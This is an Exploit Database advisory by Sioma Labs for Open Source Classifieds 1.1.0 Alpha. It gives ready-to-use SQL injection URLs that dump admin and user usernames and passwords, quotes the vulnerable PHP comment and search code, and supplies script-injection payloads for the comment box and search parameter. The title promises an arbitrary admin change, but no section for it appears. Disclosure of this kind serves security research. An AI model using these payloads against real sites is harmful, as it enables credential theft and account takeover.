Open Source Classifieds 1.1.0 Alpha (OSClassi) – SQL Injection / Cross-Site Scripting / Arbitrary Admin Change

• Exploit Database
• 14 阅读

• 作者： Sioma Labs
  日期： 2010-02-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11496/

•  __ _ __ _ 
  / _(_) ____ __ ___ __ _/ /__ _| |_____ 
  \ \| |/ _ \| '_ ` _ \ / _` |/ // _` | '_ \/ __|
  _\ \ | (_) | | | | | | (_| | / /___ (_| | |_) \__ \
  \__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/
  ========================================================================================
  Open Source Classifieds (OSClassi) SQLi/Xss/Arbitrary Admin Change Multi Vulnerabilities
  ----------------------------------------------------------------------------------------
  - Site 		: http://osclass.org/ 
  - Download: http://sourceforge.net/projects/osclass/files/
  - Author 	: Sioma Labs
  - Version 	: 1.1.0 Alpha
  - Tested on : WIndows XP SP2 (WAMP)
  
  [-------------------------------------------------------------------------------------------------------------------------]
  
  MYSQL Injection 
  ===============
  POC
  http://server/item.php?id=[SQLi]
  
  Basic Info
  http://server/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(CHAR(32,58,32),user(),database(),version())--
  
  Admin ID,Username,Password
  http://server/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from oc_admin--
  
  User ID,UserName,Password
  http://server/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from+oc_user--
  
  [-------------------------------------------------------------------------------------------------------------------------]
  Cross Site Scripting
  ====================
  
  Xss Source Review (item.php)
  ------------------------------
  
  1st Xss item.php 
  [+]To Work This You need to Have A iteam already posted (http://server/item.php?action=post)
  ------------------------------
  	case 'add_comment':
  		dbExec("INSERT INTO %sitem_comment (item_id, author_name, author_email, body) VALUES (%d, '%s', '%s', '%s')", 
  			DB_TABLE_PREFIX, $_POST['id'], $_POST['authorName'], $_POST['authorEmail'], $_POST['body']);
  		header('Location: item.php?id=' . $_POST['id']);
  		break;
  	case 'post':
  ------------------------------
  
  [+] Put This c0de in to the comment box
  "><script>alert(String.fromCharCode(88, 83, 83));</script>
  
  -------------------------------
  
  2nd Xss (search.php)
  ---------------------------------
  $pattern = $_GET['pattern'];
  --------------------------------
  
  POC
  http://server/search.php?pattern=[Xss]
  Exploit
  http://server/search.php?pattern=<script>alert(String.fromCharCode(88, 83, 83));</script>
  
  [-------------------------------------------------------------------------------------------------------------------------]
  
  [-------------------------------------------------------------------------------------------------------------------------]
  # http://siomalabs.com [Sioma Labs]
  # Sioma Agent 154